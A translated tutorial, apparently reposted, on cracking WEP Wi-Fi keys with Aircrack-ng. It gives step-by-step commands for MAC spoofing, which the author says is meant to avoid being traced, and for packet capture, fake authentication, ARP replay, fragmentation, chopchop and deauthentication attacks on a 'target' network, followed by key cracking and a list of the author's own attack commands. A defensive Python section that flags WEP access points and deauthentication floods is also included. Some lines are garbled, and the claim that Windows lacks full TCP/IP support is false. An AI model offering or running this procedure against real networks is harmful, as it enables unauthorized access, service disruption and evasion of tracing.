Aircrack-ng tutorial

Source: Internet
Author: User
Tags: network, function, bssid

The Aircrack-ng tools are also available for Windows, but I can't capture packets on Windows, so I only work from Linux; in addition, far fewer APs show up when scanning on Windows than on Linux. In fact, Windows does not fully support the TCP/IP protocol family, and some protocols cannot be used directly from Windows. The network was a Unix world from the beginning; Windows only gained networking later.

The Aircrack-ng toolkit contains many tools. I use the following:
airmon-ng: sets the NIC working mode
airodump-ng: packet capture
aircrack-ng: key cracking
aireplay-ng: packet injection and interference
The following Linux commands are also used:
ifconfig
macchanger: spoofs the MAC address
iwconfig: a tool aimed mainly at wireless network adapters (similar to ifconfig)
iwlist: shows more information about wireless networks
There are other basic Linux commands that I will not point out.
Specific cracking steps:
1. Change the wireless NIC state: first bring it down.
2. Spoof the MAC address of the wireless NIC: for safety, this reduces the chance of being traced.
3. Change the NIC working mode: a virtual NIC is created when the NIC enters monitor mode.
4. Change the wireless NIC state: bring it up.
5. View the network status, record the MAC of the AP and the MAC of the local machine, and decide on the target.
6. Packet capture: produces a .cap or .ivs file.
7. Interfere with the wireless network: intercept wireless packets and inject junk packets to obtain more usable packets.
8. Crack the .cap or .ivs file, obtain the WEP key, and the cracking is complete.


There are five attack modes, which can be used as appropriate. Your NIC may not be named ath1, wifi0 or ath0.
ifconfig -
ifconfig -a ath0 up
airmon-ng start wifi0 6
airodump-ng --ivs -w <target ivs file> -c 6 ath1
airodump-ng ath1
aireplay-ng -1 0 -e <target SSID> -a <target MAC> -h <local MAC> ath1
------------2 Crack Mode -----------
aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b <target MAC> -h <local MAC> ath1
------------3 Crack Mode -----------
aireplay-ng -3 -b <target MAC> -h <local MAC> ath1
------------4 Crack Mode -----------
aireplay-ng -4 -b <target MAC> -h <local MAC> ath1
packetforge-ng -0 -a <target MAC> -h <local MAC> -k 255.255.255.255 -l 255.255.255.255 -y <.xor file> -w MyArp
aireplay-ng -2 -r MyArp -x 256 ath1
------------5 Crack Mode -----------
aireplay-ng -5 -b <target MAC> -h <local MAC> ath1
packetforge-ng -0 -a <target MAC> -h <local MAC> -k 255.255.255.255 -l 255.255.255.255 -y <.xor file> -w MyArp
aireplay-ng -2 -r MyArp -x 256 ath1
----------- Crack Key -----------
aircrack-ng -n 64 -b <target MAC> <target ivs file>-01.ivs

------------------------------

The following describes the basic usage of each command in detail (based on each command's English help text).

1. ifconfig

Used to configure the NIC. Here it is mainly used to disable and enable the NIC:

ifconfig ath0 down

ifconfig ath0 up

The purpose of disabling the NIC is to modify the MAC.

2. macchanger

This tool is used to change the MAC address of a NIC. Its usage is as follows:

Usage: macchanger [options] device

-h: show help

-V: show version

-s: show the current MAC

-e: keep the vendor bytes of the MAC unchanged

-a: generate a random MAC of the same kind (same vendor type)

-A: generate a random MAC of any kind

-r: generate a fully random MAC

-l: list the MAC address allocations of known vendors. This is very useful: you can find out which vendor made a device from its MAC.

-m: set a custom MAC, for example macchanger --mac=00:34:00:00:00:00 ath0

3. airmon-ng

Puts the wireless NIC into monitor mode.

Usage: airmon-ng <start|stop|check> <interface> [channel]

<start|stop|check>: start, stop, or check

<interface>: the wireless NIC to use

[channel]: the channel to listen on. Most modern wireless routers default to channel 6, so this channel is the one scanned first; network administrators should change it.

4. iwconfig

A dedicated wireless NIC configuration tool used to set wireless-specific parameters. Without parameters it shows the available wireless interfaces.

Usage: iwconfig interface [options]

[essid {NN|on|off}]: set, enable or disable the ESSID

[nwid {NN|on|off}]: set, enable or disable the network ID

[mode {managed|ad-hoc|...}]: set the operating mode of the wireless interface

[freq N.NNNN[k|M|G]]: set the operating frequency

[channel N]: set the channel

[ap {N|off|auto}]: set the AP to associate with, or disable/automatic

[sens N]: sensitivity threshold

[nick N]: nickname

[rate {N|auto|fixed}]: bit-rate control

[rts {N|auto|fixed|off}]: RTS threshold control. If you don't know what this is, go back and study networking.

[frag {N|auto|fixed|off}]: fragmentation threshold control

[enc {NNNN-NNNN|off}]: encryption key

[power {period N|timeout N}]: power management period/timeout

[retry {limit N|lifetime N}]: retry limit/lifetime

[txpower N {mW|dBm}]: transmit power in mW or dBm

[commit]: apply pending changes

5. iwlist

It is mainly used to display additional information about the wireless network card.

Usage: iwlist [interface] option

scanning: scan for networks

frequency

channel

bitrate

rate

encryption

key

power: power management

txpower

ap

accesspoints: list access points

peers: directly connected peers

event

6. airodump-ng

The packet capture tool, my favourite. Its usage is as follows:

Usage: airodump-ng <options> <interface>[,<interface>,...]

Options:

--ivs: save only the captured IVs as a .ivs file

--gpsd: use GPSd

--write <prefix>: save captured packets to files with the given prefix. I usually use this, especially when several networks are being captured.

-w: same as --write

--beacons: store all beacons, which are discarded by default

--update <secs>: display update delay

--showack: show ACK/CTS/RTS statistics

-h: hide known stations (used with --showack)

-f <msecs>: time in milliseconds between channel hops

--berlin <secs>: time before an AP or client that has sent no packets is dropped from the display; 120 seconds by default. I recommend reading the original English help text, since the translation may differ; this is my understanding. (mhy_mhy note)

-r <file>: read packets from the specified file. I'd also like someone to give me a good idea of where to put the captured packets.

Filter options:

--encrypt <suite>: filter APs by cipher suite

--netmask <netmask>: filter APs by mask

--bssid <bssid>: filter APs by BSSID

-a: filter out unassociated clients

By default, airodump-ng hops on 2.4 GHz channels. Other channels or frequencies can be specified with the following options:

--channel <channels>: capture on the given channels

--band <abg>: the band to hop on

-C <frequencies>: use the given frequencies in MHz

--cswitch <method>: set the channel switching method

0: FIFO (default)

1: Round Robin

2: Hop on last

-s: same as --cswitch

--help

7. aireplay-ng

The injection tool. Note that it is highly disruptive and can even damage low-end AP hardware (routers with little memory may reboot or be bricked outright). I like this one very much and believe you will too; use it with restraint.

Usage: aireplay-ng <options> <replay interface>

Filter options:

-b bssid: MAC address of the AP

-d dmac: destination MAC

-s smac: source MAC

-m len: minimum packet length

-n len: maximum packet length

-u type: frame control, type field

-v subt: frame control, subtype field

-t tods: frame control, To DS bit

-f fromds: frame control, From DS bit

-w iswep: frame control, WEP bit

-D: disable AP detection

Replay options:

-x nbpps: number of packets per second

-p fctrl: set frame control word (hex)

-a bssid: set the MAC address of the AP

-c dmac: set the destination MAC

-h smac: set the source MAC

-g value: change the ring buffer size (default 8)

-F: choose the first matching packet

Fakeauth attack options:

-e essid: set the SSID of the target AP

-o npckts: number of packets per burst (0 = auto, default 1)

-q sec: seconds between keep-alives

-y prga: keystream for shared key authentication

ARP-request replay attack options:

-j: inject FromDS packets. I have not used this option.

Fragmentation attack options:

-k IP: set destination IP in fragments

-l IP: set source IP in fragments

Test attack options:

-B: activate the bitrate test

Source options:

-i iface: capture packets from this interface

-r file: extract packets from this pcap file

Attack modes (the numbers can still be used); this is the most destructive part:

--deauth count: deauthenticate one or all stations (-0)

--fakeauth delay: fake authentication with the AP (-1)

--interactive: interactive frame selection (-2)

--arpreplay: standard ARP-request replay (-3)

--chopchop: decrypts a WEP packet (-4)

--fragment: generates a valid keystream (-5)

--caffe-latte: queries a client for new IVs (-6)

--cfrag: fragmentation attack against a client (-7)

--test: tests injection and quality (-9)

--help: shows this help. This whole part was translated according to my own usage and is not completely accurate. It is mainly aimed at those who copy it without crediting the author; I despise plagiarism.

8. aircrack-ng

The process of cracking the key may or may not take long. It depends on two things: first, how clever the network administrator was (whether a complex key was set), and second, the speed of the computer.

Usage: aircrack-ng [options] <.cap/.ivs file(s)>

Common options:

-a <amode>: force attack mode (1 = WEP, 2 = WPA-PSK)

-e <essid>: select the target by ESSID

-b <bssid>: select the target by the AP's MAC address; this is the key identifier for the crack

-q: quiet mode (no status output)

-C <macs>: merge the given APs into one virtual AP

Static WEP cracking options:

-c: search alphanumeric characters only

-t: search binary-coded-decimal characters only

-h: search numeric keys only

-d <mask>: use masking of the key (A1:XX:CF:YY)

-m <maddr>: MAC address used to filter usable packets

-n <nbits>: WEP key length: 64/128/152/256/512

-i <index>: WEP key index (1 to 4), default: any

-f <fudge>: brute-force fudge factor, default 2. The original English wording has no good literal translation.

-k <korek>: disable one attack method (1 to 17)

-x or -x0: disable brute force on the last key bytes

-x1: brute force the last key byte (default)

-x2: enable brute force on the last two key bytes

-y: experimental single brute-force mode

-K: use only the old KoreK attacks (pre-PTW)

-s: show the key in ASCII while cracking

-M <num>: maximum number of IVs to use

-D: WEP decloak mode (skips broken IVs)

-P <num>: PTW debug: 1 disables Klein, 2 PTW

-1: run only one PTW attempt

WEP and WPA-PSK cracking options:

-w <words>: path to one or more wordlist files

-r <DB>: path to the airolib-ng database (cannot be used with -w)

--help: shows the help
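As a defender's counterpart to the WEP cracking options above and to the aireplay-ng deauthentication mode (-0), the following added example (my own code, not part of the original tutorial or of the Aircrack-ng project) parses raw 802.11 management frames the way a small wireless monitor would: it inventories which APs still advertise WEP (privacy bit set, but no WPA or RSN information element) and flags BSSIDs whose deauthentication frames arrive in bursts. The frame layout follows the 802.11 standard; the MAC addresses, SSIDs and sample frames are constructed inline, and the one-second window and threshold of 20 are assumed values.

```python
import struct
from collections import defaultdict

# 802.11 frame control byte 0 = (subtype << 4) | (type << 2) | version.
# Management frames have type 0; beacon is subtype 8, deauthentication subtype 12.
FC_BEACON = 0x80
FC_DEAUTH = 0xC0


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def parse_mgmt_header(frame):
    """Split a management frame into (fc0, addr1, addr2, bssid, body).
    Header layout: FC(2) Duration(2) Addr1(6) Addr2(6) Addr3(6) SeqCtl(2) = 24 bytes."""
    if len(frame) < 24 or (frame[0] & 0x0C) != 0:
        raise ValueError("not a management frame")
    return (frame[0], mac_str(frame[4:10]), mac_str(frame[10:16]),
            mac_str(frame[16:22]), frame[24:])


def parse_ies(data):
    """Yield (tag, value) pairs from a tagged-parameter (information element) list."""
    i = 0
    while i + 2 <= len(data):
        tag, ln = data[i], data[i + 1]
        yield tag, data[i + 2:i + 2 + ln]
        i += 2 + ln


def classify_beacon(frame):
    """Return (bssid, ssid, security) for a beacon; security is OPEN/WEP/WPA/WPA2."""
    fc0, _, _, bssid, body = parse_mgmt_header(frame)
    if fc0 != FC_BEACON:
        raise ValueError("not a beacon")
    # Fixed fields: timestamp(8) + beacon interval(2) + capability(2); bit 4 = Privacy.
    privacy = bool(struct.unpack_from("<H", body, 10)[0] & 0x0010)
    ssid, rsn, wpa = "", False, False
    for tag, val in parse_ies(body[12:]):
        if tag == 0:
            ssid = val.decode("utf-8", "replace")
        elif tag == 48:                                       # RSN IE -> WPA2
            rsn = True
        elif tag == 221 and val[:4] == b"\x00\x50\xf2\x01":  # Microsoft OUI, WPA IE
            wpa = True
    security = "WPA2" if rsn else "WPA" if wpa else "WEP" if privacy else "OPEN"
    return bssid, ssid, security


def wep_networks(frames):
    """Sorted (bssid, ssid) list of every AP whose beacons advertise WEP."""
    found = {}
    for _, frame in frames:
        try:
            bssid, ssid, security = classify_beacon(frame)
        except ValueError:
            continue
        if security == "WEP":
            found[bssid] = ssid
    return sorted(found.items())


def deauth_floods(frames, window_s=1.0, threshold=20):
    """Return {bssid: peak count} for BSSIDs whose deauth frames reach `threshold`
    within any sliding window of `window_s` seconds (the aireplay-ng -0 pattern)."""
    times = defaultdict(list)
    for ts, frame in frames:
        try:
            fc0, _, _, bssid, _ = parse_mgmt_header(frame)
        except ValueError:
            continue
        if fc0 == FC_DEAUTH:
            times[bssid].append(ts)
    alerts = {}
    for bssid, ts_list in times.items():
        ts_list.sort()
        peak, j = 0, 0
        for i, t in enumerate(ts_list):
            while ts_list[j] < t - window_s:
                j += 1
            peak = max(peak, i - j + 1)
        if peak >= threshold:
            alerts[bssid] = peak
    return alerts


# --- Constructed sample frames (not a real capture) -------------------------
def build_beacon(bssid, ssid, security):
    hdr = bytes([FC_BEACON, 0]) + b"\x00\x00" + b"\xff" * 6 + bssid + bssid + b"\x00\x00"
    cap = 0x0001 | (0x0010 if security != "OPEN" else 0)    # ESS, plus Privacy if encrypted
    s = ssid.encode()
    body = b"\x00" * 8 + struct.pack("<HH", 100, cap) + bytes([0, len(s)]) + s
    if security == "WPA2":
        body += bytes([48, 2]) + b"\x01\x00"                  # minimal RSN IE (version only)
    elif security == "WPA":
        body += bytes([221, 6]) + b"\x00\x50\xf2\x01\x01\x00"
    return hdr + body


def build_deauth(bssid, client):
    return (bytes([FC_DEAUTH, 0]) + b"\x00\x00" + client + bssid + bssid + b"\x00\x00"
            + struct.pack("<H", 7))                           # reason code 7


AP_A, AP_B = bytes.fromhex("02aabbcc0001"), bytes.fromhex("02aabbcc0002")
CLIENT = bytes.fromhex("02ddeeff0001")
SAMPLE = [(0.0, build_beacon(AP_A, "lab-legacy", "WEP")),
          (0.1, build_beacon(AP_B, "lab-wpa2", "WPA2")),
          (0.2, build_deauth(AP_B, CLIENT))]                  # a single deauth is normal
SAMPLE += [(1.0 + i * 0.02, build_deauth(AP_A, CLIENT)) for i in range(30)]  # burst

if __name__ == "__main__":
    print("WEP networks:", wep_networks(SAMPLE))
    print("Deauth floods:", deauth_floods(SAMPLE))
```

In practice the `(timestamp, frame)` pairs would come from a monitor-mode capture with the radiotap header stripped; the WEP inventory tells you which APs the cracking steps above would still work against, and the deauth counter catches the burst pattern long before clients notice they keep dropping off.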

Here are the operations performed on my own hardware:

My hardware is an Atheros a/b/g wireless card, which shows up as ath0 in Linux. I only list the commonly used command steps without further explanation:

ifconfig ath0 down

macchanger -r ath0

macchanger -r wifi0

ifconfig ath1 up

airmon-ng start ath1 6

iwconfig ath1

iwlist ath1 scanning

airodump-ng -w *.cap -c 6 ath1

aireplay-ng -1 0 -e ap_essid -a ap_mac -h XXXXXXXXXX ath1

aireplay-ng -5 -b ap_mac -h XXXXXXXXXX ath1

aireplay-ng -3 -b ap_mac -h XXXXXXXXXX -x 1024 ath1

aireplay-ng -0 1 -a 00:00:00:00:00 -c BB:BB ath1

aireplay-ng -3 -b <ap MAC> -h <my MAC> -i ath1

aircrack-ng -x -f 2 *.cap

aircrack-ng -w passdict.txt *.cap

aircrack-ng -n 64 -b apmac *.ivs

